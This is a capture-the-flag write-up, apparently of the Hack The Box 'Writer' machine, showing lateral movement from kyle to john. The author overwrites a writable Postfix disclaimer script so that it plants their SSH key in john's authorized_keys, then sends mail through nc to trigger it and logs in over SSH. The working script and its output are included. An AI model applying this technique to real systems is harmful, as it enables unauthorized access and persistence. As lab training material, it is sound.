InfoSec LAB

Writer_Lateral_Movement_john

Created: 3 min read

Postfix

As previously discovered, the Postfix instance is configured to execute the /etc/postfix/disclaimer script whenever the john user receives a new mail. Additionally, the current user (kyle) has write access to the /etc/postfix/disclaimer script.

kyle@writer:~$ cat givemejohn 
#!/bin/bash
# Overwrite SSH key to the authorized_keys file via the disclaimer script
echo 'echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" >> /home/john/.ssh/authorized_keys' > /etc/postfix/disclaimer
 
# send a mail to john to get code execution via master.cf
nc localhost 25 << EOF
EHLO writer.htb
mail from:<kyle@writer.htb>
rcpt to:<john@writer.htb>
DATA
subject: Lateral Movement
 
Thank you for the shell
.
QUIT
EOF

Since the root cronjob process is interfering, I wrote a quick bash script to automate the process

kyle@writer:~$ ./givemejohn 
220 writer.htb ESMTP Postfix (Ubuntu)
250-writer.htb
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
250 2.1.0 Ok
250 2.1.5 Ok
354 End data with <CR><LF>.<CR><LF>
250 2.0.0 ok: queued as C8AA8823
221 2.0.0 Bye

Executing

I also had PSPY running in the background to capture the whole process As shown, the disclaimer script is invoked through the configuration set in the master.cf file My public SSH key must be overwritten to the authorized_keys file of the john user

Now I should be able to connect to the target system as the john user via SSH using my own key

SSH

┌──(kali㉿kali)-[~/archive/htb/labs/writer]
└─$ ssh john@writer.htb -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Wed 19 Apr 21:13:34 UTC 2023
 
  System load:           0.03
  Usage of /:            66.4% of 6.82GB
  Memory usage:          39%
  Swap usage:            0%
  Processes:             265
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.101
  IPv6 address for eth0: dead:beef::250:56ff:feb9:8e54
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
You have new mail.
Last login: Wed Jul 28 09:19:58 2021 from 10.10.14.19
john@writer:~$ whoami
john
john@writer:~$ hostname
writer
john@writer:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.101  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:8e54  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:8e54  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:8e:54  txqueuelen 1000  (Ethernet)
        RX packets 1253981  bytes 213952324 (213.9 MB)
        RX errors 0  dropped 222  overruns 0  frame 0
        TX packets 1691962  bytes 804866956 (804.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 5115915  bytes 10739064176 (10.7 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5115915  bytes 10739064176 (10.7 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral Movement made to the john user via exploiting a misconfigured Postfix instance

Interactive Graph View

Backlinks